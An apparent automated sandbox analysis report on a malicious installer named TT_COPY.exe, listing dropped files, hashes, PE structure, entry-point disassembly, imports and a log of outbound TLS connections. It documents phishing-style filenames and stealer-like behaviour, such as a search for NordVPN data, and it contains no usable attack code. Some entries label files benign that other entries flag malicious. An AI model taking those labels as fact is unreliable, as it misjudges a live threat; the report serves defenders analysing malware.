                                                                                                                          SHA-256:E53F28526B8E67491CD5CB7D1CBC0402F0D6FCB5C8C8E9428BFDD1D46AE1D7F2
                                                                                                                          SHA-512:FDC59FA991F2EB0770A6D54B892BE9F635F35A4D5FB258D5D8259C1BD30574B24892E9DC1936CCD012366578EEDB5B0FDD989B2544842B25D45B77653BE157D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8.....0...P.h.h..a..{0cr....$'...O.!....;....v....@q..#gu......C._.p.=... ......{G.......X$.......F..7i.....@....3.....$..p..E..LwO'n...F1.[.tn....IEND.B`.
                                                                                                                          Process:C:\Users\user\Desktop\TT_COPY.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12288
                                                                                                                          Entropy (8bit):5.814115788739565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: PRE-ALERT #U007e MV#MAERSK QINZHOU V.221W - ETD HKG 16 JUN 2022 - CNTR# GCXU5775776 MRSU5685742.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8198.28791.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Variant.Razy.950064.31800.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Rensnings9.exe, Detection: malicious, Browse
                                                                                                                          • Filename: TT_COPY.exe, Detection: malicious, Browse
                                                                                                                          • Filename: PRE-ALERT #U007e MV#MAERSK QINZHOU V.221W - ETD HKG 16 JUN 2022 - CNTR# GCXU5775776 MRSU5685742.exe, Detection: malicious, Browse
                                                                                                                          • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Yeni sipari#U015f _No.129099, pdf.exe, Detection: malicious, Browse
                                                                                                                          • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Yeni sipari#U015f _No.129099, pdf.exe, Detection: malicious, Browse
                                                                                                                          • Filename: ldzOp71fAH.exe, Detection: malicious, Browse
                                                                                                                          • Filename: ldzOp71fAH.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Order Zam#U00f3wienie C156977.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Order Zam#U00f3wienie C156977.exe, Detection: malicious, Browse
                                                                                                                          • Filename: BANK SLIP.pdf.exe, Detection: malicious, Browse
                                                                                                                          • Filename: BANK SLIP.pdf.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8198.16406.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8198.16406.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8198.25853.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8198.25853.exe, Detection: malicious, Browse
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30
                                                                                                                          Entropy (8bit):3.964735178725505
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                                          MD5:9F754B47B351EF0FC32527B541420595
                                                                                                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                                          Malicious:false
                                                                                                                          Preview:NordVPN directory not found!..
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Entropy (8bit):7.717646458845207
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:TT_COPY.exe
                                                                                                                          File size:406464
                                                                                                                          MD5:0f7bc1de08b9154e6ef43bb7b4baab22
                                                                                                                          SHA1:246c92892d50e32294864ec20cd62e42892d6f8f
                                                                                                                          SHA256:7fa60356467aa478d154dcc4c738394d598b9dad765a626eaf79dc5d04ebfdf2
                                                                                                                          SHA512:a01c2c90403518b4833e213e2dcaee107879544877eb8b625c58542c5ce70cf438fcadccc6f4bb23e0969d179f706f1a0f275f80cfd3879df829751d0d603eb9
                                                                                                                          SSDEEP:12288:Vb5HiAxGa5z+VCL8kK1P6aJuOIpLgH+Sp4ya+vMs:Vb5C+Ga5VIk8JBmrYz0s
                                                                                                                          TLSH:1284E0213ED79C22C1F3CA7E1CD4AE329E6EB1CB11315A7E764CC76CA9412909D2E61D
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                                                                                          Icon Hash:f0f06094c36ee8c2
                                                                                                                          Entrypoint:0x40352d
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN="Klaphammeren retorsionernes Wise7 Kobberes Glatfre ", O=Vasodilatation7, L=Pokrent, S=Mecklenburg-Vorpommern, C=DE
                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                          Error Number:-2146762487
                                                                                                                          Not Before, Not After
                                                                                                                          • 13/06/2022 11:08:16 13/06/2023 11:08:16
                                                                                                                          Subject Chain
                                                                                                                          • CN="Klaphammeren retorsionernes Wise7 Kobberes Glatfre ", O=Vasodilatation7, L=Pokrent, S=Mecklenburg-Vorpommern, C=DE
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:7F550A68A831C55D071E625927251880
                                                                                                                          Thumbprint SHA-1:4F7B0D252A129753E0D50F4835362D36DA9B5D9A
                                                                                                                          Thumbprint SHA-256:E965FEC12F6E74F216274CF55F55569E2FC6B2C6E35BE3F511CC82AF14E2EB05
                                                                                                                          Serial:6E493B3F3401B40A
                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 000003F4h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          push 00000020h
                                                                                                                          pop edi
                                                                                                                          xor ebx, ebx
                                                                                                                          push 00008001h
                                                                                                                          mov dword ptr [ebp-14h], ebx
                                                                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                          mov dword ptr [ebp-10h], ebx
                                                                                                                          call dword ptr [004080CCh]
                                                                                                                          mov esi, dword ptr [004080D0h]
                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                          push eax
                                                                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                                                                          mov dword ptr [ebp-28h], ebx
                                                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                          call esi
                                                                                                                          test eax, eax
                                                                                                                          jne 00007FC580F41C8Ah
                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                          push eax
                                                                                                                          call esi
                                                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                                                          sub ax, 00000053h
                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                          neg ax
                                                                                                                          sbb eax, eax
                                                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                                                          not eax
                                                                                                                          and eax, ecx
                                                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                          jnc 00007FC580F41C5Ah
                                                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                          mov dword ptr [00434FB8h], eax
                                                                                                                          xor eax, eax
                                                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                          movzx eax, ax
                                                                                                                          or eax, ecx
                                                                                                                          xor ecx, ecx
                                                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                                                          movzx ecx, cx
                                                                                                                          shl eax, 10h
                                                                                                                          or eax, ecx
                                                                                                                          Programming Language:
                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe3c8.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x619900x1a30.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x68970x6a00False0.6661261792452831data6.458398214928006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x80000x14a60x1600False0.4392755681818182data5.024109281264143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0xa0000x2b0180x600False0.521484375data4.15458210408643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .ndata0x360000x270000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x5d0000xe3c80xe400False0.10099712171052631data3.8618429148772577IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_BITMAP0x5d2b00x368dataEnglishUnited States
                                                                                                                          RT_ICON0x5d6180xd228dataEnglishUnited States
                                                                                                                          RT_DIALOG0x6a8400x144dataEnglishUnited States
                                                                                                                          RT_DIALOG0x6a9880x13cdataEnglishUnited States
                                                                                                                          RT_DIALOG0x6aac80x100dataEnglishUnited States
                                                                                                                          RT_DIALOG0x6abc80x11cdataEnglishUnited States
                                                                                                                          RT_DIALOG0x6ace80xc4dataEnglishUnited States
                                                                                                                          RT_DIALOG0x6adb00x60dataEnglishUnited States
                                                                                                                          RT_GROUP_ICON0x6ae100x14dataEnglishUnited States
                                                                                                                          RT_VERSION0x6ae280x260dataEnglishUnited States
                                                                                                                          RT_MANIFEST0x6b0880x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                                                          DLLImport
                                                                                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jun 14, 2022 13:50:15.562608957 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.562623024 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.562774897 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.577543974 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.577550888 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.667443991 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.667582989 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.667603016 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.670624971 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.670824051 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.795047045 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.795099020 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.795834064 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:15.795963049 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.800316095 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:15.842502117 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.729671001 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.729852915 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:16.729890108 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.729916096 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.730092049 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:16.731514931 CEST49746443192.168.11.20216.58.212.174
                                                                                                                          Jun 14, 2022 13:50:16.731568098 CEST44349746216.58.212.174192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.920141935 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:16.920222044 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.920443058 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:16.920783043 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:16.920846939 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.018594980 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.018795013 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.021666050 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.021924973 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.025501013 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.025571108 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.026299000 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.026463985 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.026787996 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.070658922 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.272788048 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.273046017 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.275959969 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.276292086 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.278341055 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.278600931 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.278635025 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.283368111 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.283624887 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.283662081 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.283687115 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.283962011 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.285794973 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.286030054 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.286078930 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.286325932 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.308051109 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.308305979 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.308355093 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.308504105 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.309530973 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.309859991 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.309910059 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.310236931 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.311492920 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.311700106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.311866999 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.312122107 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.314275980 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.314544916 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.314604998 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.314815998 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.316802979 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.317058086 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.317109108 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.317316055 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.319081068 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.319298029 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.319350004 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.319595098 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.321624994 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.321887016 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.321934938 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.322199106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.323982954 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.324197054 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.324332952 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.324585915 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.326380014 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.326605082 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.326670885 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.326925039 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.328552961 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.328762054 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.328813076 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.329013109 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.330811977 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.331065893 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.331114054 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.331363916 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.332726955 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.332936049 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.332953930 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.332993984 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.333111048 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.335213900 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.335448980 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.335495949 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.335743904 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.337470055 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.337718010 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.337764978 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.338011980 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.339312077 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.339550972 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.339597940 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.339903116 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.341690063 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.341936111 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.341983080 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.342231035 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.343971014 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.344218016 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.344264984 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.344511986 CEST49747443192.168.11.20142.251.39.97
